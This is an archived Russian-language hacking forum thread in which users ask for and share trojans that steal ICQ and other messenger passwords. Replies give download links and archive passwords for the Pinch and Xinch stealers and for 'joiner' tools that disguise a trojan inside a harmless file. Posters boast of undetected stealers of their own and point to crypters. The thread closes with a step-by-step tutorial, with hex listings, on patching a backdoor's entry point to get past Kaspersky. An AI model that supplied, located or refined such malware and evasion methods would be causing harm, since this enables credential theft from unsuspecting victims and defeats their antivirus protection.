Просмотр полной версии : Icq троян
Здраствуйте !!! Посоветуйте плзз троя для аси чтоб пароли воровал !!! И если не сложно Описание к нему ну и сам трой :rolleyes:
Pinch v 2.57+Crack - http://xroot.hut1.ru/downloads.php?cat_id=4&download_id=98
Pinch v 2.58 + Crack - http://xroot.hut1.ru/downloads.php?cat_id=4&download_id=127
Pinch отличный троян воует от практически всего....
И пржде чем создавать эту темку юзай поиск а то таких тем уже валом...
ахаха, я ещё и ссылки дал)))ггг
Hitman_2
03.02.2006, 16:47
Xinch 1.5 private
В его комплект входят все возможности пинча 2.58 + он не палится антивирусами
_http://www.flooder.biz/uploads/xinch1.5alfa3_with_keygen.rar
pass:123
Пинч 2.58 отдыхает... Русский софт forever!!! =))
Я вот не понял.. что значит для аси???
Покажите мне хоть один троян который пароли от аси не ворует? =)
у мя есть трой который ворует пассы тока от аси , стучи в асю
трой который ворует пассы тока от аси
лол))) реально нужная вещь)
+ он не палится антивирусами
Ну допустим здесь ты погорячился:] Нод находит целых 3 трояна + неизвестный вирус)
ЗЫ:за линк спс
да нафиг он нужет лучше писать свой !!!
я вон написал и уже пол года не палиться !и отчеты регулярно приходят !
Hitman_2
04.02.2006, 07:33
Представляю... А возможности твоего троя сравнимы с возможностями Пинча??? А сервер сколько весит??? Наверняка как минимум 200kb
А у Пинча, Хинча сервер со всеми включёнными настройками 25kb + много всякмх фичей
Плзз а инструкцию к Xinch выложите кто нить, тока не ту что в папке вместе с ним !!!
Плзз а инструкцию к Xinch выложите кто нить, тока не ту что в папке вместе с ним !!!
http://www.vipusers.net/modules.php?name=Forums&file=viewtopic&t=673&sid=526a0a81c33a6b5f52b9614efb973d32
тут инструкция к пинч про, от ксинча мало чем отличается.
Фигня какаято с Ксинчем Пытаюсь отослать тест письмо он пишет не могу послать ...
Пытаюсь скомпилировать не компилирует (по серединекомпиляции застревает)...
Вощем в чем дело понять немогу .... Помогите кто нить или дайте ссылку на пинч 2.58 нормальную плзз !!!
petrovich-lamer
05.02.2006, 03:02
Помогите кто нить или дайте ссылку на пинч 2.58 нормальную плзз !!!
на первой страница этого топика. ДАРАГОЙ
с тебя плюЦ :D :D
petrovich-lamer
05.02.2006, 04:09
хех..
терь присоединяюсь к пред посту - дайте пинч без пароля на анхив, или скажите пас от этого, 2.58 =)
petrovich-lamer
05.02.2006, 04:21
блин, че все архивы битые ???
один ен открывается, пароль к нему не подбирается, другой - ваще нету билдера в хинче этом!!!
Кто-нибудь имеет НОРМАЛЬНЫЕ ЭТИ ТРОИ ????
угостите плз!
чтобы хоть посмотреть, что это такое - 25 кб :)
тока пжста не самими 25-ю килобайтами, а троем самим )
Да плзз если не жаль !!! В яндексе,гугле, и рамблее искал нашел ... Но нигде кряк неработает. Я даж видео по взлому пинча сморел серавноне работает !!!!
Есть троян который пиздит пассы от ась icq(lite 2003 и т.д.) qip @RQ trilian aim miranda отсылает через гейцт пароли на мыло. ася 30003111
icq(lite 2003 и т.д.) qip @RQ trilian aim miranda все тоже самое делает мой троян и ещё от mail ftp да и кеши присылает и тоже не палиться ! странно да ! =))) да и ещё висит там запускаеться по времени и ещй и команды исполняет твои !!
Xinch 1.5 private
Пинч 2.58 отдыхает... Русский софт forever!!! =))
а пинч что не русский! странно а я думал что его сделал
cobans ! чтото ты ты путаешь ! а за ссылочку конечно сенкс !
Hitman_2
05.02.2006, 18:03
Пинч на каком языке написан??? На инглише...
А хинч??? на русском!!! =))
ахааха
пинч писал кобан :))
хинч - передранный внаглую пинч )))
(если не верите - скачайте пинч и посмотрите на структуру и систему работы )
+))) копирайт стиллеры - те кто хинч делал, вот и всё =)) ....
Xos{HaCKeR}
05.02.2006, 21:27
народ у меня вот такая проблема ...скачал пин 2.58 запускаю билдер там типо надо ввсети пароль и имя я ввожу те ,которые даны в хелпе но все равно пишет что неправильные ...чё делать??
Jonathan Allen
05.02.2006, 21:52
Там должна быть папка "keygen" в ней смотри.
Xos{HaCKeR}
05.02.2006, 22:26
ТАМ ТАКОЙ папки нет а троян я качал отсюда http://tenebras.netsec.ru/pinch258.rar
pass: ^rin$567)ds
Xos{HaCKeR}
06.02.2006, 00:09
ПОМОГИТЕ ПЛЫЗ
Представляю... А возможности твоего троя сравнимы с возможностями Пинча??? А сервер сколько весит??? Наверняка как минимум 200kb
А у Пинча, Хинча сервер со всеми включёнными настройками 25kb + много всякмх фичей
весит мой server 7 кб
limpompo
08.02.2006, 11:20
Так XPinch палиться AVP сегодня тэстил...
Robin-bad
08.02.2006, 13:56
Да палится, ещё как, даже с базами прошлого месяца, нужен криптор и он есть... :)
Что-то у меня xinch1.5alfa3_with_keygen.rar не хочет IP SMTP сервера показывать.Говорит что .Не могу узнать.!
В чём проблема?Переустанавливал уже раз 10ть!И регистр чистил!
Xinch 1.5 private
В его комплект входят все возможности пинча 2.58 + он не палится антивирусами
_http://www.flooder.biz/uploads/xinch1.5alfa3_with_keygen.rar
pass:123
Пинч 2.58 отдыхает... Русский софт forever!!! =))
У меня палится...
Joiner (http://kisin.boom.ru/Trojans/Join155.zip) -Очень нужная программа для впаривания троянов, она сливает троян с другим файлом, что бы тот кому вы его впариваете ничего не заподозрил. 414kb
Joiner2.5 (http://kisin.boom.ru/Trojans/joiner2.5.zip) -Програмка склеивает 2 фаила в 1!Закрывает Антивирусники и Фаирволы!!! 60kb
Ну ребята сколько повторит, я же уже написал что джоинеры палят трой.Так как они в базе антвирей и скленные ими файлы сразу выдают себя даже в том случае , если ты джоинишь не вирусов а постых екзешок!
У меня палится...
У тебя какой айтвир стоит?
хех..
терь присоединяюсь к пред посту - дайте пинч без пароля на анхив, или скажите пас от этого, 2.58 =)
pass: ^rin$567)ds
откроешь на + нажимай)))
Короче зделал вывод если хочеш не палящийся троян плати деньги!
Кстати нащёт денег читай в подписи
Во...ну наконец то )) правильно! платить надо )
Зачем тебе столько реп ? потом живот будеть болеть ))))))
На вот последний раз я такой щедрый ))) а заслужил это за хорошое мудрое слово))
дык (((
Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее Dala$$.
petrovich-lamer
23.02.2006, 14:30
блин...
все получается, отчеты шлет...
тока они пустые приходят :(
0 кб
Все эти кони и клей в паблике и паляться давно AVP.Можно только купить приватных коней с которыми будет гуд.Лучше напишите мануал как самому написать трой,что поизучать для этого,в паблике есть исходники Pins,на основе их можно и свой зделать.Лучше учиться и развиваться,чем брать уже готовое...
ну так вперед! учись и развЕвайся... кто ж мешает?
может когда "разовешся" до неимоверных приделов собственный мануал выложишь
блин...
все получается, отчеты шлет...
тока они пустые приходят
0 кб
(для тех у кого такая же трабла)
могу кнечно ошибаться
я открываю отчеты зебатом отчет нулевой (точнее само вложение в письме 0)
а если аут глюком то усе фурычит (тоесть фаилик имеет нормальный)
Ребята, cлышал я есть такая прога, прогоняешь вирус или трой через неё, и трой не палится :) .
Правда есть такая? :confused:
seeattact
07.03.2006, 02:59
Есть такие - это крипторы.
Есть такие - это крипторы.
Где взять?
Как она работает? :confused:
seeattact
08.03.2006, 03:09
Где взять?
Как она работает? :confused:
купить http://forum.antichat.ru/thread14355.html
Крипторы тебе помогут только от проверки монитором.
купить http://forum.antichat.ru/thread14355.html
:confused: Может, бесплатно есть? :confused:
seeattact
08.03.2006, 04:04
:confused: Может, бесплатно есть? :confused:
есть
ищи тут http://yandex.ru/yandsearch?stype=www&nl=0&text=%E1%E5%F1%EF%EB%E0%F2%ED%FB%E5+%EA%F0%E8%EF%F 2%EE%F0%FB
Вот (http://slil.ru/22575088).
Зверька зовут Xinch 1.53 alpha 4.
Ворует ВСЁ! :)
http://www.wasm.ru/toollist.php?list=12
Незнаю не пробовал юзайте может понравитса)
Вот статейка
Как спрятать Троян (точнее EXE-файл который определяется антивирусом) ...
Что для этого нужно:
1) По принципу сам троян (В качестве трояна я взял редактор сервера Троян Lamer's Death который определяется как
------------------------------------------------------------------------------------------
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован UPX
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Инфицирован Backdoor.Death.26
------------------------------------------------------------------------------------------
То, что он уже пакованый UPX это нам немешает (хотя, может кто и хочет распаковать тот пусть распаковывает...)
2) Программа под названием topo.exe или topo12.exe
С ее помощью открываем наш зловещий вирус editor.exe
от программы сразу будет предложение создать новую секцию или использовать старую ?
http://img394.imageshack.us/img394/8525/image0017fx.jpg
по сути можно выбрать и тот, и другой вариант, но советую использовать старую
так как антивирусы могут использовать название секции в будущем...
ДЛЯ НАГЛЯДНОСТИ ПРИМЕР
В самой программе ставим галочку на слове Redirect Entrypoint
и добавляем 15 байт (Здесь также используется ваша фантазия... можете вписывать туда свою дату рождения...)
БОЛЕЕ ПОДРОБНО
после всего сделаного жмем "Do It!"
http://img394.imageshack.us/img394/1111/image0025xr.jpg
теперь мы поменяли начало загрузки трояна и переехал он на новый адрес... 004974F1
теперь проверяем наш троянчик Касперским...
бля орет сволочуга
но говорит что наш вирус упакован PE_Patch
--------------------------------------------------------------------------------------------
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован PE_Patch
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован UPX
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Инфицирован Backdoor.Death.26
--------------------------------------------------------------------------------------------
3) Вот теперь мы берем в руки HEX-Editor HIEW.EXE
запускаем HIEW.EXE выбираем из всех файлов наш зловещий editor.exe
жмем последовательно Enter, далее F4, далее F3, далее F8, далее F5
бог ты мой какое чудо мы оказались на адресе 004974F1
и начиная с адреса 004974F1 до адреса 004974FB
мы видим эти вот самые циферки состоящие из 90 (это и есть наши добавленые 15 байт)
.004974F1: 90 nop
.004974F2: 90 nop
.004974F3: 90 nop
.004974F4: 90 nop
.004974F5: 90 nop
.004974F6: 90 nop
.004974F7: 90 nop
.004974F8: 90 nop
.004974F9: 90 nop
.004974FA: 90 nop
.004974FB: E960FEFFFF jmp .000497360 -------- (1)
дело в том что антивирус видит эту часть кода и узнает ее...
далее едет в ход так называемый "МЕТОД ТЫКА"
жму F3 и редактирую эти циферки...
гы... а по простому вставляю мусор
проще говоря замените в некоторых местах значение 90 (вот она хитрость...)
самого програмного кода они все равно невыполняют так что меняйте их как хотите...
004974F1: 90 nop
004974F2: 90 nop
004974F3: 0000 add [eax],al (здесь наклепал нулей)
004974F5: 90 nop
004974F6: 90 nop
004974F7: 91 xchg ecx,eax (здеcь вставил еденицу...)
004974F8: 90 nop
004974F9: 90 nop
004974FA: 90 nop
004974FB: E960FEFFFF jmp .000497360 -------- (1)
после проделоного сохраняем изменения жмем F9
и выходим из программы
проверяем на работоспособность нашь зловещий вирус...
Гы работает и ничего не изменилось открывается и ошибок никаких просто зашибись все...
проверяем его касперским и тот тоже не жалуется говорит что все оки...
---------------------------------------------------------------------------------------------
C:\WINDOWS\Рабочий стол\ld27b3\editor.exe OK
---------------------------------------------------------------------------------------------
Воть :cool: в любом случае можно не зная языка программирования упрятать exe-файл вируса либо троянца...
seeattact
08.03.2006, 20:09
выложи прогу
выложи прогу
Я бы с радостью, сам когда-то это делал, винду снёс, проги вместе с ней...
Поищи по названию topo12.exe а вторая HIEW.EXE
seeattact
08.03.2006, 20:40
Я бы с радостью, сам когда-то это делал, винду снёс, проги вместе с ней...
Поищи по названию topo12.exe а вторая HIEW.EXE
И чё ты винду снёс и решил распрощятся с этой прогой.Ты ведь же её откуда то взял.Или просто ты эту статью скопировал откуда нибудь.
например отсюда http://sprutic.boom.ru/antiavp.htm
seeattact
08.03.2006, 20:44
программу topo12 можно скачать отсюда http://www.team-x.ru/xforum/index.html?act=Attach&type=post&id=20172
Это было год назад =) Ищи в нете, проги халявные...
seeattact
08.03.2006, 20:52
Это бло год назад =) Ищи в нетероги халявные
ты сам понял что написал.
^^ теперь да
вот, вторую прогу выложил ;> http://rapidshare.de/files/15007859/hiew32.exe.html
topo12.exe - Win32/Topo.12 Virtool =)
ИМХО алгоритм уже давно в базах. Хотя не факт...
topo12.exe - Win32/Topo.12 Virtool =)
ИМХО алгоритм уже давно в базах. Хотя не факт...
Факт.:)
что и следовало ожидать =)
зы: Особенно если обратить внимание на слова автора "Это было год назад" :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot